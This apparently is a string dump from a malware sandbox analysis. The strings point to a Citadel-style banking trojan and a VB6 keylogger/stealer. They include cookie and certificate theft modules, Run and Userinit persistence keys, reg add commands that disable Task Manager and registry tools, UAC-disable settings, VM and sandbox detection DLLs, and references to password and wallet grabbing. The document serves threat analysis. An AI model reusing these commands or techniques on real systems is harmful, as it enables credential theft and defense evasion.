WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed, retries %d, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for data failed, 0xx
WriteFullMemory.Desc.Write(0x%x) failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for info failed, 0xx
Kernel minidump write failed, 0xx
MarshalExceptionPointers.CxRecord.Read(0x%I64x, 0x%x) failed, 0xx
MarshalExceptionPointers.ExRecord.Read(0x%I64x, 0x%x) failed, 0xx
Invalid exception record parameter count (0x%x)
Invalid exception record size (0x%x)
Invalid CPU type (0x%x)
Invalid function table size (0x%x)
GetSystemType.GetOsInfo failed, 0xx
GetSystemType.GetCpuType failed, 0xx
Write.Start failed, 0xx
Dump type requires streaming but output provider does not support streaming
Invalid dump type 0x%x
dbghelp.dll
Alloc(0x%x) failed
Thread(0x%x) will not be included
GenGetImageSections.Section.Read(0x%I64x, 0x%x) failed, 0xx
GenGetImageSections.GenImageNtHeader(0x%I64x) failed
GenGetImageSections.Read(0x%I64x, 0x%x) failed, 0xx
0GenAllocateThreadObject.GetTebInfo(0x%x) failed, 0xx
GenAllocateThreadObject.GetContext(0x%x) failed, 0xx
GenAllocateThreadObject.Open(0x%x) failed, 0xx
GenReadTlsDirectory.Index(0x%I64x, %ws) failed, 0xx
GenReadTlsDirectory(0x%I64x, %ws) unknown machine 0x%x
GenReadTlsDirectory.Read(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenDebugRecord(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenImageNtHeader(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetImageHeaderInfo(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetVersion(0x%I64x, %ws) failed, 0xx
GenAllocateProcessObject.GetPeb(0x%x) failed, 0xx
GenIncludeUnwindInfoMemory.Enum(0x%I64x, 0x%x) failed, 0xx
GenGenTebMemory.TLS(0x%I64x) failed, 0xx
GenScanAddressSpace.QueryVirtual(0x%I64x) failed, 0xx
0GenGetAuxMemory(%ws) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) looped
GenGetProcessInfo.EnumFunctionTableEntries(0x%I64x, 0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) looped
GenGetProcessInfo.EnumModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumModules(0x%x) looped
GenGetProcessInfo.EnumThreads(0x%x) failed, 0xx
GenGetProcessInfo.EnumThreads(0x%x) looped
GenGetProcessInfo.Start(0x%x) failed, 0xx
GenWriteHandleData.Desc.Write(0x%x) failed, 0xx
GenWriteHandleData.Header.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectName.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeName.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.Start(0x%x) failed, 0xx
GenWriteHandleData.Seek(0x%x) failed, 0xx
Software\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls
Software\Microsoft\Windows NT\CurrentVersion\KnownManagedDebuggingDlls
version.dll
ntdll.dll
?msodatad.dat
msodatalast.dat
Unicows.dll
Kernel32.dll
SHLWAPI.DLL
GDI32.DLL
wintrust.dll
1108160
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
KERNEL32.dll
OLEACC.dll
OLEAUT32.dll
MSVCRT.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
USER32.dll
VERSION.dll
WININET.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ReportEventA
ReportEventW
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyW
GetProcessHeap
GetSystemWindowsDirectoryW
_amsg_exit
_acmdln
ShellExecuteExA
UrlGetPartA
CreateURLMoniker
CreateDialogIndirectParamA
EnumWindows
HttpQueryInfoA
HttpSendRequestExA
HttpOpenRequestA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpEndRequestA
dw20.pdb
\devsplab1\otools\BBT_TEMP\DW20O.pdb
winword.exe
wwordlt.exe
excel.exe
excellt.exe
mspub.exe
frontpg.exe
outlook.exe
powerpnt.exe
powpntlt.exe
onenote.exe
infopath.exe
winproj.exe
ois.exe
visio.exe
crys.exe
name="Microsoft.Windows.ErrorReporter"
version="5.1.0.0"
publicKeyToken="6595b64144ccf1df" />
<description>Windows Error Reporting</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
1%s\%s\%s\%s\%s\%s\%s\%s
AppName: %s AppVer: %s AppStamp:%s
ModName: %s ModVer: %s ModStamp:%s
fDebug: %s Offset: %s
Main_AlwaysReportBtn=
Main_NoReportBtn=
Main_ReportBtn=
General_Reportee=
CheckBoxRegKey=
ReportingFlags=
Stage1URL=
Stage2URL=
%General_Reportee%
%u %s
%u.%u %s
%s %s %s %s in %s %s %s fDebug %s at offset %s
Bucket: d
BucketTable %d
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s %s
\dw.log
policy.txt
crash.log
status.txt
hits.log
count.txt
%s\%s\%s
%s\%s\%s\%s
eDWQueuedReporting
DWPersistentQueuedReporting
"%s\%s" -%c
dwtrig20.exe
ReportSize=
\*.cab
dwq.snt
"%s" -%c %u
SEventSystem.EventSubscription
SubscriptionID=%s
Comctl32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\166F97.dmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
.NET Runtime 2.0 Error Reporting
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dw.log
Microsoft Application Error Reporting
11.0.8160
Windows
DW20.Exe

crys.exe_3640_rwx_00130000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}

svchost.exe_2084:

.text
`.data
.rsrc
MSVBVM60.DLL
DW_EXEC
S_EXEC
FTPUPLOAD
P_FTP
P_UDP
P_HTTP
P_KEYLOGGER
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
wininet.dll
DeleteUrlCacheEntryA
FindExecutableA
ShellExecuteA
VBA6.DLL
InternetOpenUrlA
<MKey>
</MKey>
update.exe
\POS.exe
\dwm.exe
<Keyl>
</Keyl>
\KY.html
.html
post.php
\output.txt
wscript.shell
WordPad.exe
HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\
HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\currentversion\winlogon\Userinit
\system32\Userinit.exe
HKEY_LOCAL_MACHINE64\software\microsoft\windows\currentversion\winlogon\Userinit
\uninstall.vbs
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "0" /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "0" /f
WScript.Sleep(3000)
Scripting.FileSystemObject
PV4.deletefile
PV4.DeleteFile WScript.ScriptFullName
cmd.exe /c
\update.vbs
WScript.Sleep(2000)
Set ObjShell = WScript.CreateObject(
WScript.Shell
Set ObjVarE = ObjShell.Environment(
PV4.CopyFile
\update.exe
VARIABLE.Run
Microsoft.XMLHTTP
Adodb.Stream
Windows
gate.php
MSXML2.ServerXMLHTTP
application/x-www-form-urlencoded
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\UACDisableNotify
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKEY_LOCAL_MACHINE64\Software\Microsoft\Security Center\UACDisableNotify
HKEY_LOCAL_MACHINE64\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
\Melt.bat
winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2
select * from win32_operatingsystem
adoKit.dll
vboxmrxnp.dll
vmGuestLib.dll
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f
SbieDll.dll
\Dropbox\host.db
shell32.dll, 2
shell32.dll, 3
.fldr
shell32.dll, 0
\explorer.exe
\deact.config
\pos.config
\ky.config
70144646
Shell.Application
ShellExecute
consent.exe
bin.base64
\grabbed.log
plugins/passwords.p
\Flog.log
plugins/PTF.p
\Elog.log
\UDP.ini
\HTTP.ini
\capture.jpg
.wallet
inc/email.php
\email.txt
plugins/keylogger.p
Internet Explorer\iexplore.exe
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MyApp 1.0; Windows NT 5.1)
inc/read.php
4.02.0301

dwm.exe_440:

.text
`.data
.rsrc
MSVBVM60.DLL
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
VBA6.DLL
user32.dll
SetWindowsHookExA
UnhookWindowsHookEx
kernel32.dll
GetAsyncKeyState
@*\AC:\Users\Edbitss\Documents\gorynych\source\Plugins\keylogger\Local_Security_Authority_Process.vbp
\KY.html
Key-Spy Report -
>[KEYLOGGER REPORT]</span></span></p>
4.07.0046
Hook.exe

crys.exe_3640_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg

scvhost.exe_3704_rwx_00B20000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}
:\Documents and Settings\"%CurrentUserName%"\Application Data\Muaz\ydfeb.ofo
%Documents and Settings%\%current user%\Application Data\Muaz
ydfeb.ofo

scvhost.exe_3704_rwx_00CF0000_0006C000:

<1%u3
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
